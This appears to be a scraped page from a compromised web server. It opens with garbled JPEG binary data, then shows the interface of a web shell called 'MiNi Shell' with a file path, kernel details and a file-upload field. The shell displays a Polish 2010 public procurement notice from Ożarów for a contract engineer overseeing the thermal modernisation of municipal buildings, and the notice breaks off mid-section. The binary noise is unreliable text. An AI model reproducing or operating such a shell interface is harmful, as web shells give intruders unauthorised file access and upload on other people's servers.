JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100524/132339-N-2010.html

<p class="kh_header"><b>Ożarów: Pełnienie funkcji Inżyniera kontraktu dla termomodernizacji kompleksu budynków biblioteki, domu kultury z salą widowiskową, budynku UMiG oraz budynku komunalnego w Ożarowie</b><br>
<b>Numer ogłoszenia: 132339 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Ożarowie , ul. Stodolna 1, 27-530 Ożarów, woj. świętokrzyskie, tel. 015 8610700 do 702, faks 015 8611136.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ozarow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera kontraktu dla termomodernizacji kompleksu budynków biblioteki, domu kultury z salą widowiskową, budynku UMiG oraz budynku komunalnego w Ożarowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres czynności Inżyniera kontraktu  obejmuje;
Inżynier, w ramach wykonywania przedmiotu zamówienia, zobowiązany jest wykonywać
niżej wymienione czynności:
1) prowadzić nadzór inwestorski nad robotami, w szczególności w zakresie zgodnym 
z wymaganiami Ustawy Prawo Budowlane, tj. wykonywać obowiązki inspektora nadzoru inwestorskiego i koordynatora czynności inspektorów nadzoru inwestorskiego. Nadzór będzie wykonywany przez personel Inżyniera posiadający odpowiednie uprawnienia przewidziane Ustawą Prawo Budowlane.
2) administrować, monitorować, rozliczać i zarządzać 2 kontraktami wchodzącymi w skład projektu, w szczególności pod względem formalnym i finansowym, w sposób zgodny m.in. 
z obowiązującymi przepisami w zakresie ustawy Prawo zamówień publicznych, Prawo budowlane, Kodeks Cywilny.
3) przygotowywać dokumenty niezbędne przy i do realizacji projektu finansowanego ze środków Mechanizmu Finansowego EOG.
4) współpracować ze wskazanymi przez Zamawiającego pracownikami Zamawiającego 
i konsultantami zewnętrznymi w sposób, który zapewni sprawne zrealizowanie projektu 
w założonym czasie i zgodnie z zaplanowanym budżetem.
5) wspierać Zamawiającego przy realizacji projektu oraz przy wykonywaniu zobowiązań wynikających z obowiązujących przepisów.
 Szczegółowe obowiązki Inżyniera:
1) sprawdzać poprawność i zgodność z treścią wnoszonych lub przedkładanych przez Wykonawców robót zabezpieczeń należytego wykonania kontraktów/Umów w rozumieniu art. 147 Prawa Zamówień Publicznych i pisemnie powiadamiać Zamawiającego o wynikach sprawdzenia wraz z zaleceniami, w przypadku opinii negatywnej, o wniesionym lub przedłożonym zabezpieczeniu.
2) egzekwować od Wykonawców robót, w określonych przypadkach przedłożenia nowego dokumentu zabezpieczenia w określonym terminie.
3) przygotować dla Zamawiającego, w ustalonym przez Zamawiającego terminie, pisemnej opinii (w aspekcie formalnym i merytorycznym ) i wszelkich niezbędnych dokumentów stanowiących podstawę roszczenia do Wykonawcy robót z zabezpieczenia należytego wykonania Kontraktu jeśli zajdzie taka okoliczność. W przypadku niewłaściwego wywiązywania się Wykonawcy z Kontraktu. Inżynier będzie wspierał Zamawiającego w dochodzeniu i egzekwowaniu od Wykonawcy robót należnego odszkodowania i kar umownych za nienależyte i nieterminowe wykonanie Kontraktu, jak to regulują warunki Kontraktu.
4)  przygotować na polecenie Zamawiającego pisemnej opinii na temat możliwości zwolnienia zabezpieczenia należytego wykonania Kontraktu w ustalonym terminie, jaki poda Zamawiający.
5) Inżynier zapewni swój współudział w przekazaniu Terenu Budowy Wykonawcy robót.
6) sprawdzić wytyczenia robót przez Wykonawców robót budowlanych.
7)  przechowywać - w biurze Inżyniera kopii Kontraktów na roboty (Inżynier otrzyma kopie najszybciej jak to możliwe po podpisaniu Kontraktów na roboty, Inżynier otrzyma także najszybciej jak to będzie możliwe od Zamawiającego 1 kopię każdej Zmiany do Kontraktu na roboty). Przechowywać wszelkie notatki dotyczące sposobu realizacji Kontraktów w szczególności jako materiału dowodowego w przypadku powstania sporów, roszczeń Wykonawcy robót, katastrof, wypadków i innych okoliczności. Uczestniczenie w przekazaniu Wykonawcy wszystkich niezbędnych dokumentów wraz z kontrolą ich kompletności.
8)  posiadać i przechowywać wszelkie dokumenty sporządzone przez Wykonawcę robót (w szczególności: rysunki dokumentacji wykonawczej, specyfikacje, obliczenia, rysunki dokumentacji powykonawczej, instrukcje) w biurze Inżyniera zapewnionym przez Zamawiającego - zgodnie do wskazań Zamawiającego.
9) opiniować, rekomendować, weryfikować i analizować rysunki, dokumentację projektową, dokumentację wykonawczą i inne dokumenty wykonawcze, specyfikacje, obliczenia, instrukcje sporządzane przez Wykonawcę robót. Inżynier sporządzał będzie pisemne opinie i wskazywał konieczne korekty tych dokumentów, (jeśli to konieczne) w terminie ustalonym przez Zamawiającego. Jeśli Inżynier wyda pozytywną opinię będzie zobowiązany następnie natychmiast zatwierdzić wymienione dokumenty z punktu widzenia: wymagań Zamawiającego zawartych w Kontrakcie, poprawności technicznej i formalnej. Inżynier zobowiązany jest do zalecania wszelkich zmian w specyfikacjach, dokumentacji projektowej, które są według niego konieczne dla realizacji robót tym samym zatwierdzając je. Inżynier będzie zobowiązany posiadać i przechowywać te dokumenty.
10)  Inżynier będzie prowadził i przechowywał wszelką korespondencję.
11)  Inżynier będzie akceptował Harmonogram realizacji każdego Kontraktu i Plan Płatności w porozumieniu z Zamawiającym, w ciągu 10 dni od przedłożenia Harmonogramu Inżynierowi przez Wykonawcę. Dodatkowo Inżynier pierwszy uzgodniony z Wykonawcą Harmonogram i Plan przedłoży Zamawiającemu do akceptacji w ciągu 7dni od zawarcia Kontraktu. Każdy Harmonogram musi zawierać: plan odbiorów częściowych i końcowych oraz warunki akceptacji faktur składanych przez Wykonawcę Robót.
12) . Inżynier natychmiast powiadomi pisemnie Zamawiającego o każdym opóźnieniu robót i planowanych płatności, wskaże przyczyny powstania oraz metody naprawcze. Inżynier natychmiast pisemnie powiadomi Zamawiającego o wszelkich wykrytych lub podejrzewanych nieprawidłowościach na budowie.
13) sprawdzać poprawność uprawnień i ich aktualność (przynależność do izby, ubezpieczenie) Kierownika Budowy i Kierowników Robót Wykonawcy wskazanych 
w Kontrakcie. Informację o wynikach sprawdzenia zawrze w Raporcie kwartalnym.
14) sporządzać dla Zamawiającego pisemną opinię (w ciągu 5 dni od złożonego wniosku do Inżyniera) - w aspekcie formalnym i merytorycznym - w sprawie zgody na dokonanie zmiany personelu wskazanego w ofercie Wykonawcy robót i Kontrakcie, jeśli z takim wnioskiem wystąpi Wykonawca, Zamawiający lub Inżynier.
15)  kontrolować sposób składowania i przechowywania materiałów przez Wykonawców robót, zatwierdzać materiały budowlane i instalacyjne oraz urządzenia i dostawy przewidziane przez Wykonawcę robót do wbudowania, sprawdzać autentyczność, kompletność, prawidłowość i formułować zalecenia dotyczące wszelkich certyfikatów, atestów, dokumentów jakości, aprobat, deklaracji zgodności, gwarancji, praw własności itp., w celu nie dopuszczenia do wbudowania materiałów wadliwych lub niedopuszczonych dostosowania, sprawdzać jakość oraz zgodność materiałów budowlanych i instalacyjnych oraz urządzeń i dostaw z Kontraktem.
16)  Inżynier dokona zatwierdzeń przedstawionych metod wykonywania robót budowlanych włączając roboty tymczasowe zaproponowane przez Wykonawcę robót zgodnie z Kontraktem.
17)  Inżynier jest zobowiązany do wydawania Wykonawcy robót; Kierownikowi Budowy lub Kierownikowi Robót poleceń, potwierdzonych wpisem w Dzienniku Budowy, dotyczących w szczególności: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania 
w budownictwie wyrobów budowlanych oraz urządzeń technicznych, żądać od Wykonawcy robót; Kierownika Budowy lub Kierownika Robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub Pozwoleniem na budowę.
18) dokonywać odbioru robót zanikających i ulegających zakryciu.
18)  Inżynier pisemnie zaopiniuje zasadność przedłużenia terminu ukończenie robót wraz z analizą skutków finansowych i formalnych dla Kontraktu na roboty, w określonym przez Zamawiającego terminie.
19) Inżynier wyda polecenie zawieszenia całości lub części prac Wykonawcy, w przypadkach określonych Kontraktem na Roboty, po uzyskaniu pisemnej zgody Zamawiającego.
20) Inżynier udzieli zezwolenia Wykonawcy na wznowienie całości lub części prac w przypadkach przewidzianych w Kontrakcie na Roboty po uzyskaniu pisemnej zgody od Zamawiającego. Inżynier pisemnie zaopiniuje zasadności zawieszenia i wznowienia robót wraz z analizą skutków finansowych i formalnych dla Kontraktu na roboty na żądanie Zamawiającego i w określonym przez Zamawiającego terminie.
21)  Inżynier pisemnie zaopiniuje (w aspekcie formalnym i merytorycznym) przyczyny nie dotrzymania terminu ukończenie z winy Wykonawcy stanowiące podstawę dla Zamawiającego o wystąpienie o odszkodowanie za zwłokę i do dochodzenia (na zasadach ogólnych Kodeksu Cywilnego) odszkodowania uzupełniającego przenoszącego wysokość kar umownych - do wysokości rzeczywiście poniesionej szkody. Opinia zostanie wykonana na żądanie Zamawiającego w ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym określonym przez Zamawiającego terminie.
22)  Inżynier będzie wyrażał zgodę na pracę poza godzinami ustalonymi w Kontrakcie na roboty i w dni wolne od pracy.
23)  Inżynier sprawdzi wykonanie robót i powiadomi Wykonawcę robót o wykrytych wadach oraz określi zakres robót niezbędnych do wykonania celem usunięcia wad wraz z podaniem terminu ich wykonania a następnie dokona odebrania wykonanych robót usuwających wady, w ciągu 7 dni od usunięcia wad pisemnie poświadczy usunięcie wad przez Wykonawcę robót. Przygotuje od strony formalnej - zgodnej z Prawem Zamówień Publicznych -, merytorycznej i finansowej zlecenie (postępowanie) ws. usunięcia wad innemu Wykonawcy w przypadku, jeśli Wykonawca robót nie usunie wad w ciągu 7 dni od wydania pisemnego polecenia przez Zamawiającego lub w innym wyznaczonym przez Zamawiającego terminie.
24)  Inżynier przeprowadzi z Wykonawcą robót odbiory częściowe, (jeśli są przewidziane) i końcowy robót, wystawi Protokół odbioru, sprawdzi pod względem jakości, kompletności, prawidłowości dokumenty wymagane do odbioru przedłożone przez Wykonawcę robót i przygotuje i przedłoży Zamawiającemu pozostałe niezbędne do odbioru dokumenty. Inżynier wyegzekwuje od Wykonawcy wykonanie zaleceń poodbiorowych. Rozpoczęcie czynności odbiorowych wykonanych robót nastąpi w ciągu 21 dni od daty zgłoszenia gotowości do odbioru przez Wykonawcę robót. Inżynier zawiadomi wszystkich uczestników odbioru (w tym: Wykonawcę, Zamawiającego) o wyznaczonym terminie rozpoczęcia czynności odbioru, co najmniej 7 dni przed jego rozpoczęciem. Czynności odbiorowe zostaną zakończone w terminie 21 dni liczą od dnia ich rozpoczęcia.
25) Inżynier przygotuje (w uzgodnieniu z Zamawiającym) i przedłoży Zamawiającemu Protokoły odbioru, w terminach wynikających z Kontraktu na roboty po otrzymaniu wniosku Wykonawcy robót. Opiniować i rekomendować każdą propozycję zmiany do Kontraktu na roboty pod względem finansowym, formalnym - zgodnym z Prawem Zamówień Publicznych i rzeczowym z podaniem skutków: (koszt i czas).
26)  informować Zamawiającego o możliwości powstania roszczenia Wykonawcy robót.
27)  natychmiast informować Zamawiającego o powstałych roszczeniach (przyczyny), przedłożyć Zamawiającemu wszelkie dokumenty związane z roszczeniem wraz z analizą i pisemną opinią o sposobie rozwiązania i skutkach w tym: koszt, czas, w ciągu 5 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym terminie ustalonym przez Zamawiającego.
28)  sporządzać protokoły potwierdzające wykonanie robót w ciągu 14 dni od otrzymania od Wykonawcy robót kompletu dokumentów rozliczeniowych. Odpowiednie protokoły potwierdzające wykonanie musi mieć wyodrębnione części dotyczące kosztów - kwalifikowanych i niekwalifikowanych. Inżynier będzie proponował takie wyodrębnienie kosztów (lub wartości) na podstawie wytycznych Instytucji Pośredniczącej/Zarządzającej i Zamawiającego. Zamawiający poda Inżynierowi dyspozycje dotyczące kosztów lub innych wartości dla potrzeb sporządzania Rozliczeń.
29)  sprawdzać poprawność faktur Wykonawcy robót pod względem merytorycznym, rachunkowym i formalnym i rekomendował do zapłaty.
30)  Cała korespondencja pomiędzy Wykonawcą robót i Inżynierem dotycząca płatności musi być wysyłana w formie kopii do Zamawiającego. Inżynier będzie przestrzegał obowiązku koordynacji wykonania Kontraktu na Roboty z działaniami w obiektach.
31)  Inżynier przygotuje dla Kontraktów na roboty i usługi wszelkie dokumenty niezbędne do wystawienia protokołu ostatecznego odbioru robót i rozliczenia ostatecznego oraz wystawi je oraz przedstawi pisemne sprawozdanie o stanie zrealizowanych czynności wynikających 
z wymogów dla okresu gwarancji na roboty i usługi oraz zawrze w sprawozdaniu spis wykonanych czynności a także spis koniecznych do sporządzenia dokumentów dla prawidłowego zakończenia kontraktu i zwolnienia Zabezpieczenia należytego wykonania Kontraktu w terminie podanym przez Zamawiającego.
32) Inżynier ma obowiązek organizowania z udziałem Wykonawcy robót, Zamawiającego okresowych narad na Terenie Budowy (przynajmniej 1 raz w miesiącu, a w okresie nasilenia prac 1 raz w tygodniu) oraz sporządzanie notatki z przebiegu spotkania. Na spotkaniach należy dążyć do podejmowania bieżących decyzji dotyczących wszystkich zagadnień mających wpływ na postęp robót Inżynier będzie dążył do polubownych rozwiązań sporów, oceniał i rozstrzygał roszczenia i problemy, zapobiegał sporom i opóźnieniom. Inżynier będzie dostarczał Zamawiającemu dokumenty potwierdzające postęp Robót rzeczowy i finansowy i oraz prognozę dotyczącą przyszłych płatności dla Wykonawcy. Forma i zakres rzeczowy i merytoryczny takich dokumentów i prognoz zostanie przekazany Inżynierowi przez Zamawiającego po podpisaniu Umowy. Inżynier musi mieć świadomość, że forma 
i zakres tych dokumentów mogą ulec zmianie w trakcie realizacji Umowy z uwagi na zmiany wprowadzane przez (Krajowy Punkt Kontaktowy, Komitet Mechanizmu Finansowego EOG - lub innej instytucji pośredniczącej). Dokumenty te i prognozy Inżynier będzie przedkładał, jako część Raportów.
Szczegółowe obowiązki Inżyniera wynikające z realizacji obowiązku
administrowania, monitorowania rozliczania i zarządzania w szczególności pod
względem formalnym i finansowym Kontraktów w sposób zgodny z obowiązującymi
przepisami w tym w szczególności z: ustawą Prawo zamówień publicznych, z ustawą
Prawo budowlane, ustawą Kodeks Cywilny.
Inżynier będzie zobowiązany do:
1) przestrzegania i wdrażania procedur związanych z administrowaniem i zarządzaniem Projektem realizowanym przy wsparciu z Mechanizmu Finansowego EOG i do egzekwowania od Wykonawcy robót przestrzegania tych procedur; w szczególności dotyczy to: przestrzegania ustawy Prawo Zamówień Publicznych; treści, formy i zakresu wystawianych przez Wykonawcę robót faktur, Planów Płatności i Harmonogramów dla Kontraktu; zasad rozliczania Umowy Inżyniera, a także do: wykonania rzeczowego i finansowego rozliczenia Kontraktu zgodnie z zasadami prowadzenia rozliczeń oraz stosowanymi regulacjami dla Projektów Mechanizmu Finansowego EOG; do wypełniania list sprawdzających w zakresie wskazanym przez Zamawiającego.
2) prowadzenia monitoringu, raportowania, audytów. Inżynier będzie na polecenie Zamawiającego w terminach podanych przez Zamawiającego przygotowywał, udostępniał i kompletował wszelkie dokumenty niezbędne dla wszelkich kontroli, jakim będzie podlegał Zamawiający.
3) przygotowywania w terminach podanych przez Zamawiającego dla Zamawiającego - jeśli zażąda niezbędnych sprawozdań, raportów rzeczowych i finansowych oraz innych opracowań wymaganych przez (Krajowy Punkt Kontaktowy EOG - lub innej instytucji pośredniczącej) ze szczególnym uwzględnieniem raportów dla Komitetu Monitorującego.
4)  monitorowania wskaźników Projektu i sygnalizowania wszelkich zagrożeń wynikających z tego monitoringu z należytym wyprzedzeniem.
5) przygotowania w terminach podanych przez Zamawiającego wszelkich dokumentów niezbędnych dla rozliczenia finansowego Projektu.
Inżynier zobowiązany jest:
6)  znać wszystkie dokumenty programowe, przepisy, normy, zasady i ich aktualizacje dotyczące realizacji Kontraktu i Projektu finansowanego z Mechanizmu Finansowego EOG.
7)  Korzystać z/i znać wszelkie publikacje na stronach internetowych: Komisji Europejskiej, Ministerstwa Rozwoju Regionalnego, Ministerstwa Finansów, Urzędu Zamówień Publicznych (lub ich odpowiedników w razie ewentualnej zmiany).
8) Gromadzić i w prawidłowy sposób grupować i segregować wszelkie dane niezbędne do przygotowania Raportu końcowego z wykonania Projektu. Inżynier musi monitorować i kontrolować zgodność zakresu rzeczowego nadzorowanego Kontraktu z zakresem podanym w Wniosku (Aplikacji). Inżynier ma obowiązek informować natychmiast pisemnie Zamawiającego o każdym powstałym odstępstwie.
9)  Przedstawiać wizualnie lub pisemnie tożsamość EOG to jest stosować w instruktażach, biuletynach, konferencjach prasowych, prezentacjach i zaproszeniach związanych z Projektem jak również w tablicach informacyjnych i pamiątkowych podkreślenie współfinansowania przez EOG zgodnie z obowiązującymi Wytycznymi dla Projektu. Wszystkie publikacje i materiały pisemne i audiowizualne związane z Projektem i jego realizacja muszą przedstawiać logo EOG oraz Zamawiającego. (Wszystkie uzgodnienia, włączając identyfikację wizualną są zawarte w Wytycznych dotyczących zasad identyfikacji wizualnej, publikowanych przez Instytucję zarządzającą oraz Instytucje pośredniczące).
10)  Wspierać Zamawiającego w zakresie public relation w postaci przygotowania materiałów o treści i charakterze informacyjnym dotyczących realizowanego Projektu w zakresie zadań Inżyniera, niezbędnych do potwierdzenia wszelkiego typu akcji informacyjno promocyjnych, w tym aktualizacji działów internetowego serwisu.
11)  Przygotowywać w terminach podanych przez Zamawiającego materiały do publikacji w serwisie internetowym na temat realizowanego Projektu. Materiały te muszą być zgodne z Ustawą z dnia 6 września 2001 r. o dostępie do informacji publicznej oraz z Rozporządzaniem Min. Spraw Wew. i Adm. z dnia 17maja 2002 r. w sprawie Biuletynu Informacji Publicznej. Materiały przygotowane do publikacji w serwisie internetowym muszą byś obsługiwane przez popularne przeglądarki internetowe typu: Internet Explorer, Mozilla, FireFox, Safari.
12) Nadzorować i egzekwować umiejscowienie i aktualność wymaganych tablic informacyjno-promocyjnych o realizowanym Projekcie.
13)  Inżynier będzie odpowiedzialny za informowanie wszystkich zaangażowanych stron o tym, że wszystkie działania podjęte w ramach Projektu są współfinansowane przez (EOG, Gminę Ożarów). Wszystkie publikacje, oświadczenia i wywiady prasowe związane z Projektem, jak również informacje przekazywane podczas szkoleń, seminariów i konferencji muszą w jasny sposób, podkreślać rolę EOG w współfinansowaniu przedsięwzięcia.
 Dodatkowe informacje dotyczące wykonywania obowiązków przez Inżyniera:
1)  Inżynier musi działać zgodnie z udzielonymi pełnomocnictwami przekazanymi mu przez Zamawiającego zgodnie z Umową.
2)  Inżynier będzie miał upoważnienie wydawania poleceń Zmian w każdej części Kontraktu, w której według jego opinii, jest to potrzebne lub właściwe. Jednakże takie upoważnienie musi być uprzednio uzyskane w formie pisemnej Zamawiającego a także Inżynier zobowiązany jest do uzyskania opinii Projektanta, jeśli to konieczne.
3) Inżynier nie będzie miał upoważnienia do zwolnienia Wykonawcy z jakichkolwiek jego obowiązków, zobowiązań, czy odpowiedzialności wynikającej z Kontraktu ani nie ma żadnego upoważnienia do skreślenia jakiejkolwiek części Kontraktu i przyznania jej innemu Wykonawcy.
4)  Inżynier zorganizuje pracę swojego Personelu w taki sposób, aby Kontrakt był nadzorowany i wykonany zgodnie z Harmonogramem Projektu (Planem Wdrożenia Projektu) i Harmonogramem Kontraktu.
5)  Inżynier ma obowiązek zapewnić na każdym etapie realizacji Umowy udział ze swojej strony Radcy Prawnego, (który będzie zobowiązany przygotować opinie prawne, jeśli Zamawiający zażąda i w terminie ustalonym przez Zamawiającego).
6)  Konsultacje z Zamawiającym poprzez konsultacje i doradztwo odbywać się będą przynajmniej raz w miesiącu według potrzeby i na wezwanie Zamawiającego, w siedzibie Zamawiającego w Ożarowie.
7) Inżynier będzie zobligowany do odbywania krótkoterminowych wyjazdów do Warszawy i do NFOŚiGW i innych instytucji, jeśli zajdzie taka potrzeba. Koszt takich wyjazdów będą pokrywane przez Inżyniera.
 Informacje o projekcie
Projekt dotyczy wykonania robót budowlanych polegających na termomodernizacji 2 obiektów. Projekt będzie realizowany w trzech częściach, podzielonych w następujący sposób:
a) Kontrakt nr I- termomodernizacja kompleksu budynków biblioteki, domu kultury z salą widowiskową oraz budynku komunalnego w Ożarowie, wykonywany w terminie październik 2010  obejmujący wykonanie:
- montaż zaworów termostatycznych przy grzejnikach;
- wymiana stolarki okiennej i drzwiowej;
-ociepleniu   fundamentów, ścian  szczytowych oraz stropów,
- wykonaniu obróbek blacharskich, 
-częściowej wymianie stolarki okiennej i drzwiowej- okiennej na PCV a drzwiowej na aluminiową,
- wykonaniu instalacji odgromowej,
- wymianie instalacji centralnego ogrzewania,
-przebudowie kotłowni gazowej.
b) Kontrakt nr II -termomodernizacja budynku Urzędu Miasta i Gminy w Ożarowie
- montaż zaworów termostatycznych przy grzejnikach;
- wymiana stolarki okiennej i drzwiowej;
-ociepleniu  fundamentów,  ścian  szczytowych oraz stropów,
- wykonaniu obróbek blacharskich, 
-częściowej wymianie stolarki okiennej i drzwiowej- okiennej na PCV a drzwiowej na aluminiową,
- wykonaniu instalacji odgromowej,
- wymianie instalacji centralnego ogrzewania,
Wartość robót budowlanych na oba kontraky ok. 2 300 000,00 zł brutto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożyć oświadczenie z art. 22 Ustawy Prawo zamówień publicznych na załączonym druku- załącznik nr 1 do oferty, ocena tego warunku na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć :
